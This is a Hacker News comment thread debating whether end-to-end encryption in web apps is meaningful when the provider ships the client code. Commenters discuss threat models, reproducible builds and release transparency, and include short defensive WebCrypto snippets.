The updating part reminds me of my friend's research: "WAIT: Protecting the Integrity of Web Applications with Binary-Equivalent Transparency" (https://arxiv.org/abs/2104.06136), where they attempted to get web projects closer to the integrity guarantees of a desktop application. It doesn't fix the issue completely, because updateability is an attack vector for desktop applications as well, but I remember it being pretty cool and a nice step in that direction.
upofadown 782 days ago [-]
The three prerequisites for E2EE:

1. All cryptographic keys controlled by the users.

2. Some way to confirm you are actually connected to who you think you are connected to.

3. A way to confirm that the code you are running is not leaking keys/content.

This rant covers a particular aspect of #3. E2EE is hard. It is too bad that the marketing is working overtime to convince us that it is not.

arianvanp 782 days ago [-]
E2EE not only protects the users against the company; it protects the company against the users. You can't leak data that you don't have. It makes compliance easier.
quickthrower2 782 days ago [-]
I think the same argument means any RPC-type encryption is also insecure.

Even if the encryption itself is done using a 3rd party trusted library that is definitely kosher, the endpoint may have been compromised to leak whatever information to the public web.

Ergo there is no such thing as e2e encryption unless you have military level control over both ends of the pipe and the pipe itself.

bhawks 782 days ago [-]
The author has tunnel vision that the only actors in the room are users, service provider and the state. (And the service provider is colluding with users for some reason to stymie the state's power).

Service providers are made up of employees, contractors, interns and temps. Given a pile of easily searchable user information one of these individuals working for the service provider is going to start poking around that pile of information for reasons not aligned with providing the service. (Boredom, compromise, love interests, personal activism, etc).

End to end encryption terminated on the client puts a powerful boundary between the individual user and the individuals working for the service provider. It makes your private data strictly safer.

ssss11 782 days ago [-]
If the encryption happens client-side (even in the browser) then it's fine, as long as only you can access the private key. How to prove that this is the case is a different question; is there a way other than open-sourcing your code? I don't think so.
MattPalmer1086 782 days ago [-]
If your browser has access to your private key, and you are running code on someone else's web site to perform cryptographic operations, then it can simply exfiltrate your private key.
ryan-c 782 days ago [-]
The WebCrypto API has an extractable: false option, though the fact that there's no way to serialize a non-extractable key limits its usefulness.
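e.g.:

    // a non-extractable signing key: usable via crypto.subtle, never exportable
    const { privateKey } = await crypto.subtle.generateKey(
      { name: 'ECDSA', namedCurve: 'P-256' },
      false,               // extractable: false
      ['sign', 'verify']);
    // crypto.subtle.exportKey('pkcs8', privateKey) now rejects; the key object
    // can still be persisted via IndexedDB's structured clone, just never read out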
ryan-c 782 days ago [-]
> There are at least two such cases

The first was Hushmail.

https://www.wired.com/2007/11/encrypted-e-mai/

littlestymaar 782 days ago [-]
To convince yourself that this is a very poor argument, you just need to replace E2E encryption in the post with “password hashing”: “What's the point of hashing the password if an attacker can just catch the password when the user logs in, or change the server code in order to disable hashing altogether”.

The thing is that “attackers gaining read access to a database” is (unfortunately) a much more common threat than “attacker can execute arbitrary code on the server instead of the application for a long time”.

GTP 782 days ago [-]
But if the fundamental issue is that the JS code that runs in your browser is provided by the same entity providing the back-end, couldn't we have a different entity that, on a different domain, serves JS code that interacts with the backend of the original service? I know this is not the case now, but this is theoretically a possibility, right?
ryan-c 782 days ago [-]
I would argue that the "distributed by the same entity which it purports to secure against" is a less relevant distinction than this makes it out to be.

Consider, for example, Signal's progenitor, TextSecure, or E2EE for RCS.

What's stopping a government from compelling these services to ship backdoored code and then compelling the telco to spill the now-vulnerable ciphertext — which doesn't also stop them from doing the same to modern Signal?

I would also argue that the FBI/Apple example is exactly that scenario — the code being distributed by a different entity (Apple) from which it purports to secure against (any party with physical access).

hlandau 782 days ago [-]
Author here. I think the problem is the notion of services shipping code. If you get the endpoint software from a different entity to the communications provider, that's the first step to fixing this. XMPP+OMEMO etc. would be examples of this kind of arrangement, whereas Whatsapp/Signal actually ban the use of third party clients.

Once you have this, there are now two nodes which need to be coerced to compromise the system - the endpoint software provider and the communications provider. Well, actually, just one - the endpoint software could just be changed to use a different, compromised communications provider (I think you were envisaging some more subtle compromise of ciphertext above).

This can be fixed, however. A lot of the work Linux distros have done around reproducible builds, and the new focus on release transparency, is informative here. You could absolutely have a FOSS project with a release process that requires multiparty signatures of releases with the release signers in different jurisdictions, and requiring proof of logging to a release transparency log, etc.
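To sketch the verification end of that (a toy N-of-M check; the manifest format is invented and WebCrypto ECDSA is assumed):

    // accept a release only if at least `threshold` known signers signed it
    async function verifyRelease(tarball, signatures, signerKeys, threshold) {
      let valid = 0;
      for (const { keyId, sig } of signatures) {
        const key = signerKeys[keyId];  // CryptoKey per trusted release signer
        if (key && await crypto.subtle.verify(
              { name: 'ECDSA', hash: 'SHA-256' }, key, sig, tarball)) {
          valid++;
        }
      }
      return valid >= threshold;  // e.g. 2 of 3 signers in different jurisdictions
    }

The hard parts are organisational: signer key distribution, and making clients actually check.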

I suspect a lot of pushback on this is because the implications are significant, Emperor's New Clothes and all, but fixing this sort of thing is the first step to solving the problem. Pretty much the entire internet community was in a mindset of "but government wouldn't ever do..." complacency before Snowden, despite increasingly blatant warning signs, before people were forced to accept that reality. (The reason is simple; it's a funny thing about humans, when they realise some fact X being true would be very materially inconvenient to them, their first reaction is to argue that X isn't true, as though reality is negotiable...) Having an accurate view of just how impaired our security model is in this area is the first step to making things better IMO.

ryan-c 782 days ago [-]
I think, to a large extent, this is a question of threat models.

You're absolutely right that a lot of E2EE is fundamentally a "circle of protection against law", but that doesn't mean it isn't useful. The protection varies a lot depending on which law (jurisdiction) the threat has, after all.

Against a government entity, communications providers (telcos) can be considered already compromised, and represent approximately zero marginal resistance.

Even reproducible builds and audits only raise the bar, they can't solve the problem completely. I'm sure other comments are bringing up reflections on trusting trust, and the underhanded crypto contest has run a few times (I was a finalist).

I suppose my point is that security in real-world systems is never absolute, and always involves trade offs. Our goal should be to have better trade offs.

ryan-c 782 days ago [-]
What if we had certificate transparency, but for apps distributed via app stores?
littlestymaar 775 days ago [-]
> Well, actually, just one - the endpoint software could just be changed

That's exactly what makes your entire argument silly: when you use a piece of software, you're trusting that piece of software, and there's no way around this; being web-based doesn't change a damn thing compared to any other software with automatic updates.

raincom 782 days ago [-]
I would like to see what Chinese intelligence says about Signal and WhatsApp. What applications do they recommend? Better to use the apps Chinese intelligence recommends for their employees in the West, and vice versa: use the NSA's recommended apps in China, Russia and other places.

Remember Crypto AG in Switzerland, owned by the CIA. The Chinese and Russians never bought Crypto AG secure phone systems.

EGreg 782 days ago [-]
Can’t this argument be made for nearly all implementations of cryptography?

I trust Metamask and 1Password and Meta with their claims of not sending my secret keys to their servers. Just take their word for it!

I trust Apple with their claims about the “secure enclave”

I trust Google with their claims about Chrome not “phoning home” all my keys

I trust Intel with their SGX extensions (and Signal does also)

I trust AWS with their KMS (“key management service”), and so does the Magic crypto wallet etc., and even “the experts” like tptacek tell us to “just use AWS”

If we ran the national elections electronically, then in theory, Google or Apple could defraud millions of voters into recording incorrect votes and help steal the election.

Our hardware is made by only a few companies. They could have put all kinds of backdoors.

I am not going to go so far as to say the NSA promoted weakened EC curves, but I guess it's possible

But in general, everyone has a Trusted Computing Base:

https://en.m.wikipedia.org/wiki/Trusted_computing_base

Which is why I don’t want to rely on individual devices for security. I prefer a blockchain and having multiple devices secure data.

trashburger 782 days ago [-]
I enjoyed the dialogue posted at the bottom, and made an Ace Attorney version of it (with very minor artistic liberties taken): https://objection.lol/objection/5277436
upofadown 782 days ago [-]
Wasn't Lavabit about SSL keys? Did Lavabit even make any claims about E2EE?
foreigner 782 days ago [-]
Could this issue not be solved by a third party browser plugin to do the crypto?
jcq3 782 days ago [-]
How about delegating to a third party to solve the centralization issue?
mediumsmart 781 days ago [-]
I remember Lavabit. I think he gave them a print-out of the keys in very fine print before shutting down.
ExoticPearTree 782 days ago [-]
Most of the E2E claims are based on technicalities: like when you upload a file via HTTPS it is encrypted and then when you download it later via HTTPS, the transfer itself is encrypted. Therefore, E2E encryption.

In a previous life, the killer app for E2E was "encrypted email", where a lot of companies would claim they do email encryption by having outside recipients visit a website, for which the recipient would get a password by SMS, in order to read the email sent. And because the website was hosted by the sender over HTTPS... voila, encrypted email. And the salespeople from these companies all kept a straight face when explaining how secure the encryption was.

MattPalmer1086 782 days ago [-]
That is not E2E encryption, that is Point to Point (P2P) encryption.

To be E2E, the file should only be decryptable by the sender and receiver. The point in the middle should not be able to see its plaintext or decrypt its ciphertext.
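Concretely, in the E2E version the encryption happens before anything leaves the device, so the middle only ever stores ciphertext; a minimal sketch with WebCrypto AES-GCM (the key is assumed to be shared between the two ends out of band):

    // client side: the server receives only iv + ciphertext
    async function encryptForUpload(fileBuffer, key) {
      const iv = crypto.getRandomValues(new Uint8Array(12));
      const ciphertext = await crypto.subtle.encrypt(
        { name: 'AES-GCM', iv }, key, fileBuffer);
      return { iv, ciphertext };
    }

TLS on the upload and download legs is then just transport; it adds nothing to what the middle can see.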

Culonavirus 782 days ago [-]
It's also what the article omits... Yes, "the authority" that made the E2E software can screw you over, sure, but that's where it ends. There are good reasons for E2E encryption beyond doing shady shit or messing with governments. E2E solves an entire class of server-side security and personnel issues. Some moderator type of person browsing your nudes? Not possible. Hackers stealing data from the server? You don't care; they can't decrypt it.
MattPalmer1086 782 days ago [-]
I completely agree. It's completely valid to say that E2E cannot protect you from the provider of the cryptographic software. It also fails if the end points themselves are compromised.

There is still tremendous value in being protected from absolutely everyone else.

ExoticPearTree 782 days ago [-]
This is how they sold it: E2E. Could not reason with those people.

What I am saying is that people tend to slap the E2E label on pretty much anything without understanding what it really means.
